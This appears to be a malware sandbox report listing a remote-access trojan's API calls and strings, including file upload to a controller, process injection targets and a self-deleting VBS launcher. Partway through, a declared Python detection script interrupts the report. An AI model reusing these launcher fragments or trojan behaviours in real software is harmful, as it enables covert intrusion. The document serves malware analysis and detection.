                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                          • API String ID: 738084811-1354618412
                                                                                          • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                                                                          • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                                                                          • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                                                                          • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                                                                          • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                                                                          • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                                                                          • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Write$Create
                                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                                          • API String ID: 1602526932-4212202414
                                                                                          • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                          • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                                                                          • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                          • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                                                                          APIs
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                          • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                          • API String ID: 2490988753-3443138237
                                                                                          • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                          • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                                                                          • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                          • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3899193279-0
                                                                                          • Opcode ID: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                                                                          • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                                                                          • Opcode Fuzzy Hash: 7152c14c9f043405eb9b9a37d5c5f1e16380f97c3d25ee63cda43d2d9904c190
                                                                                          • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                                                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                                                                          • _free.LIBCMT ref: 0044E4DF
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 0044E501
                                                                                          • _free.LIBCMT ref: 0044E516
                                                                                          • _free.LIBCMT ref: 0044E521
                                                                                          • _free.LIBCMT ref: 0044E543
                                                                                          • _free.LIBCMT ref: 0044E556
                                                                                          • _free.LIBCMT ref: 0044E564
                                                                                          • _free.LIBCMT ref: 0044E56F
                                                                                          • _free.LIBCMT ref: 0044E5A7
                                                                                          • _free.LIBCMT ref: 0044E5AE
                                                                                          • _free.LIBCMT ref: 0044E5CB
                                                                                          • _free.LIBCMT ref: 0044E5E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID: pF
                                                                                          • API String ID: 161543041-2973420481
                                                                                          • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                          • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                                                                          • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                          • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                                                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                          • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                                                                          • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                                                                          • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                                                                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                                                                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                                                                          • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                                                                          • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                                                                          • Sleep.KERNEL32(00000064), ref: 00411C63
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                          • String ID: /stext "$$.F$@#G$@#G
                                                                                          • API String ID: 1223786279-2596709126
                                                                                          • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                                                                          • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                                                                          • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                                                                                          • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: pF
                                                                                          • API String ID: 269201875-2973420481
                                                                                          • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                                          • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                                                                          • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                                          • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                                                            • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                                                                          • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                                          • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                                                                          • API String ID: 193334293-3226144251
                                                                                          • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                                                                          • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                                                                          • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                                                                                          • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                                                                          APIs
                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                                                                          • GetCursorPos.USER32(?), ref: 0041B39E
                                                                                          • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                                                                          • ExitProcess.KERNEL32 ref: 0041B41A
                                                                                          • CreatePopupMenu.USER32 ref: 0041B420
                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                          • String ID: Close
                                                                                          • API String ID: 1657328048-3535843008
                                                                                          • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                          • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                                                                          • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                          • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$Info
                                                                                          • String ID:
                                                                                          • API String ID: 2509303402-0
                                                                                          • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                                                                          • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                                                                          • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                                                                          • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                                                                          • __aulldiv.LIBCMT ref: 00407D89
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408038
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                          • API String ID: 3086580692-2596673759
                                                                                          • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                                                                          • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                                                                          • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                                                                          • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                                                                          APIs
                                                                                          • RegEnumKeyExA.ADVAPI32 ref: 0041A47F
                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041A4B0
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnumOpen
                                                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$UninstallString
                                                                                          • API String ID: 1332880857-3730529168
                                                                                          • Opcode ID: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
                                                                                          • Instruction ID: 4431336161eaad6e2d2aa402c01db4654b3b7c935e82bf046b55a61e03329e01
                                                                                          • Opcode Fuzzy Hash: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
                                                                                          • Instruction Fuzzy Hash: 966132311182419BC328EB51D891EEFB3E8EF94348F50493FF586921E2EF749949CA5A
                                                                                          APIs
                                                                                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                                                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                                                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                                                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                                                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                                                                          • ExitProcess.KERNEL32 ref: 0040C57D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                                                                          • API String ID: 1913171305-2600661426
                                                                                          • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                                                                          • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                                                                          • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                                                                                          • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
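The function above drops a .vbs into Temp that runs a hidden `cmd /c` via WScript.Shell and then deletes itself with Scripting.FileSystemObject, before the RAT calls ShellExecuteW and ExitProcess. The following Python is an added triage example, not code from the report or from the sample: it recognises that script body from the two fragments listed in the String ID line and pulls out the command the script would run, and it flags the resulting wscript.exe -> cmd.exe chain in process-creation telemetry. The script text and the event records are constructed sample input; the exact script layout and the event field names (image, parent_image, parent_command_line, command_line) are assumptions, not a real schema.

```python
"""Triage helpers for a VBS self-delete/launcher stub of the kind listed above.

Added example; not part of the Joe Sandbox report or of the analysed sample.
All sample data below is constructed.
"""
import re

# Fragments as they appear in the report's String ID line for this function.
RUNNER_FRAGMENT = 'CreateObject("WScript.Shell").Run "cmd /c ""'
SELF_DELETE_FRAGMENT = (
    'CreateObject("Scripting.FileSystemObject")'
    '.DeleteFile(Wscript.ScriptFullName)')

# Case-insensitive matchers for the two fragments. Inside a VBS string
# literal a doubled quote ("") is one literal quote, so the runner's
# 'cmd /c ""' is the start of a quoted path.
RE_RUNNER = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd\s+/c\s+""', re.IGNORECASE)
RE_SELF_DELETE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)'
    r'\.DeleteFile\(Wscript\.ScriptFullName\)', re.IGNORECASE)
# The report also lists the closing fragment '""", 0': end of the quoted
# command plus window style 0 (hidden). Capture what sits between them.
RE_COMMAND = re.compile(r'\.Run\s+"cmd\s+/c\s+""(.*?)""",\s*0', re.IGNORECASE)
# A .vbs launched from a Temp directory, as seen in the parent command line.
RE_TEMP_VBS = re.compile(r'\\Temp\\[^"\s]+\.vbs\b', re.IGNORECASE)


def scan_vbs(text):
    """Return which fragments a script body contains and the wrapped command.

    'command' is the path/command the stub would hand to cmd /c, with VBS
    doubled quotes collapsed back to single quotes, or None if absent.
    """
    match = RE_COMMAND.search(text)
    return {
        "runner": RE_RUNNER.search(text) is not None,
        "self_delete": RE_SELF_DELETE.search(text) is not None,
        "command": match.group(1).replace('""', '"') if match else None,
    }


def is_self_deleting_launcher(text):
    """True when both the cmd /c runner and the self-delete call are present."""
    flags = scan_vbs(text)
    return flags["runner"] and flags["self_delete"]


def suspicious_chain(events):
    """Return command lines of cmd.exe children spawned by wscript.exe
    running a .vbs from a Temp directory (assumed field names)."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("\\cmd.exe"):
            continue
        if not ev["parent_image"].lower().endswith("\\wscript.exe"):
            continue
        if RE_TEMP_VBS.search(ev["parent_command_line"]):
            hits.append(ev["command_line"])
    return hits


# Constructed script body, assembled from the report's fragments; the real
# stub may differ in layout.
SAMPLE_VBS = (
    'CreateObject("WScript.Shell").Run "cmd /c ""'
    r'C:\Users\victim\AppData\Local\Temp\update.exe'
    '""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject")'
    '.DeleteFile(Wscript.ScriptFullName)\r\n')

# Constructed process-creation records: one matching chain, two benign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "parent_command_line":
         r'wscript.exe "C:\Users\victim\AppData\Local\Temp\install.vbs"',
     "command_line": r'cmd /c "C:\Users\victim\AppData\Local\Temp\update.exe"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "parent_command_line": "explorer.exe",
     "command_line": "cmd /c dir"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "parent_command_line": "userinit.exe",
     "command_line": r'wscript.exe "\\fileserver\netlogon\map.vbs"'},
]

if __name__ == "__main__":
    print(scan_vbs(SAMPLE_VBS))
    print(suspicious_chain(SAMPLE_EVENTS))
```

Both checks are deliberately narrow: the script matcher needs the WScript.Shell runner and the FileSystemObject self-delete together, and the process matcher needs wscript.exe as the parent with a Temp-resident .vbs, so ordinary logon scripts and interactive cmd.exe use do not trigger.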
                                                                                          APIs
                                                                                          • connect.WS2_32(?,?,?), ref: 004048C0
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                                                                          • WSAGetLastError.WS2_32 ref: 00404A01
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                          • API String ID: 994465650-2151626615
                                                                                          • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                                                                          • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                                                                          • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                                                                          • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                                                                          APIs
                                                                                            • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                                                                          • __dosmaperr.LIBCMT ref: 00452ED6
                                                                                          • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                                                                          • __dosmaperr.LIBCMT ref: 00452EF5
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                                                                          • GetLastError.KERNEL32 ref: 00453091
                                                                                          • __dosmaperr.LIBCMT ref: 00453098
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                          • String ID: H
                                                                                          • API String ID: 4237864984-2852464175
                                                                                          • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                          • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                                                                          • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                          • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
